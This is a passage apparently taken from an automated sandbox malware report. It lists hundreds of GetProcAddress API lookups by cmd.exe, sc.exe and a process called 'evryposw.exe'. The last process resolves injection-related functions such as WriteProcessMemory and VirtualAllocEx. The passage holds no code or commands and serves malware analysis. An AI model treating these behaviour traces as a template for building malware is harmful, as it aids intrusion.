00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003340)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002920)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002876)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004864)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004864)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00004152)\n 